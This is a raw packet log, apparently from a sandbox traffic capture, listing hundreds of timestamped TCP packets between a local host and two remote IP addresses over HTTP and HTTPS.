Sep 27, 2024 00:15:16.146892071 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146894932 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146905899 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146914959 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146922112 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146927118 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146929979 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146938086 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146946907 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146954060 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146967888 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146981001 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.146991968 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.146996021 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.147011042 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.147023916 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.147028923 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.147039890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.147051096 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.147054911 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.147078037 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.147085905 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.147115946 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.172282934 CEST	49714	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:16.172322035 CEST	443	49714	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:16.172415972 CEST	49714	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:16.173911095 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.173960924 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.173976898 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174004078 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.174011946 CEST	49714	443	192.168.2.5	188.114.96.3
Sep 27, 2024 00:15:16.174026966 CEST	443	49714	188.114.96.3	192.168.2.5
Sep 27, 2024 00:15:16.174066067 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174081087 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174098969 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174115896 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174134970 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174135923 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.174163103 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174165010 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.174179077 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.174182892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174199104 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174216986 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174226999 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.174235106 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174254894 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174266100 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.174294949 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.174346924 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174365997 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.174465895 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.179508924 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179543972 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179558039 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179605007 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.179639101 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179657936 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179677963 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179688931 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.179694891 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179717064 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179724932 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.179753065 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.179788113 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179804087 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179820061 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179837942 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179855108 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179863930 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.179872990 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179883003 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.179893017 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.179914951 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180022955 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180038929 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180056095 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180072069 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180088043 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180094004 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180119991 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180130959 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180130959 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180147886 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180177927 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180186987 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180196047 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180221081 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180237055 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180242062 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180398941 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180397987 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180414915 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180429935 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180445910 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180460930 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180466890 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180479050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180496931 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180506945 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180512905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180521965 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180530071 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180545092 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180553913 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180568933 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180569887 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180583954 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.180588007 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.180608034 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218193054 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218211889 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218244076 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218259096 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218272924 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218278885 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218288898 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218305111 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218326092 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218349934 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218389034 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218405008 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218420029 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218442917 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218478918 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218493938 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218506098 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218519926 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218524933 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218539000 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218549967 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218646049 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218660116 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218672991 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218688011 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218688965 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218700886 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218714952 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218719006 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218729973 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218744040 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218746901 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218785048 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218796968 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218842030 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218857050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218869925 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218893051 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218902111 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.218908072 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.218930960 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219058990 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219073057 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219086885 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219100952 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219115019 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219115973 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219141960 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219156027 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219228983 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219243050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219255924 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219269991 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219278097 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219286919 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219295025 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219295979 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219307899 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219321966 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219335079 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219341040 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219348907 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219352961 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219382048 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219636917 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219650984 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219672918 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219677925 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219688892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219702959 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219712019 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219717026 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219733000 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219742060 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219747066 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219760895 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219775915 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219784975 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219789982 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219805002 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219819069 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219829082 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219830990 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219846964 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219847918 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219858885 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.219863892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.219908953 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.220072031 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.220084906 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.220098019 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.220110893 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.220112085 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.220125914 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.220144033 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.220175028 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.227485895 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.260756969 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.260838985 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.260869026 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.260886908 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.260891914 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.260905027 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.260930061 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.260938883 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.260957003 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.260974884 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.260979891 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.260993958 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.261017084 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.261049986 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.261074066 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.261089087 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.261101007 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.261116982 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.261131048 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.261143923 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.261168957 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.261209011 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.266691923 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.266722918 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.266740084 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.266755104 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.266772985 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.266782999 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.266791105 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.266809940 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.266819000 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.266844988 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.266860962 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.266870975 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.266876936 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.266895056 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.266902924 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267033100 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267055988 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267071962 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267081976 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267091036 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267107010 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267110109 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267127991 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267143965 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267148972 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267167091 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267180920 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267185926 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267227888 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267261982 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267278910 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267306089 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267360926 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267379045 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267400026 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267405987 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267421961 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267437935 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267453909 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267466068 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267469883 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267496109 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267498016 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267509937 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267512083 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267549992 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267745018 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267769098 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267786026 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267801046 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.267812967 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.267869949 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305118084 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305138111 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305160999 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305174112 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305197954 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305212021 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305227041 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305226088 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305243969 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305253983 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305296898 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305372953 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305388927 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305402994 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305418015 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305425882 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305433035 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305448055 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305460930 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305464029 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305500031 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305563927 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305578947 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305593014 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305607080 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305607080 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305624008 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305629969 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305639982 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305661917 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305804014 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305819035 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305833101 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305846930 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305850983 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305864096 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305879116 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305893898 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305902004 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305908918 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305913925 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305924892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305939913 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.305942059 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.305964947 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306144953 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306160927 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306174994 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306190014 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306205034 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.306212902 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.306226015 CEST	49711	80	192.168.2.5	147.45.44.104
